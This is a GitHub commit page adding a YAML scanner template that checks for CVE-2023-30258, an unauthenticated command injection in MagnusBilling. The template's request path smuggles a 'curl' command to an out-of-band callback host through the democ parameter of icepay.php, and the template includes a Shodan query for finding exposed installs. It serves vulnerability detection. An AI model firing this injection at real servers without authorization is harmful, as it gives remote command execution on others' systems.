-
Notifications
You must be signed in to change notification settings - Fork 2.7k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #8687 from gy741/rule-add-v150
Create CVE-2023-30258.yaml
- Loading branch information
Showing
1 changed file
with
49 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,49 @@ | ||
id: CVE-2023-30258 | ||
|
||
info: | ||
name: MagnusBilling - Unauthenticated Remote Code Execution | ||
author: gy741 | ||
severity: critical | ||
description: | | ||
Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request. | ||
remediation: | | ||
Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. | ||
reference: | ||
- https://nvd.nist.gov/vuln/detail/CVE-2023-30258 | ||
- https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 9.8 | ||
cve-id: CVE-2023-30258 | ||
cwe-id: CWE-78 | ||
epss-score: 0.108410000 | ||
epss-percentile: 0.945280000 | ||
cpe: cpe:2.3:a:magnussolution:magnusbilling:*:*:*:*:*:*:*:* | ||
metadata: | ||
vendor: magnussolution | ||
product: magnusbilling | ||
shodan-query: http.html:"magnusbilling" | ||
verified: true | ||
max-request: 1 | ||
tags: cve,cve2023,magnusbilling,rce,oast,unauth | ||
|
||
http: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/mbilling/lib/icepay/icepay.php?democ={{randstr}};curl%20{{interactsh-url}};#" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: interactsh_protocol # Confirms the HTTP Interaction | ||
words: | ||
- "http" | ||
|
||
- type: word | ||
part: interactsh_request | ||
words: | ||
- "User-Agent: curl" | ||
|
||
- type: status | ||
status: | ||
- 200 |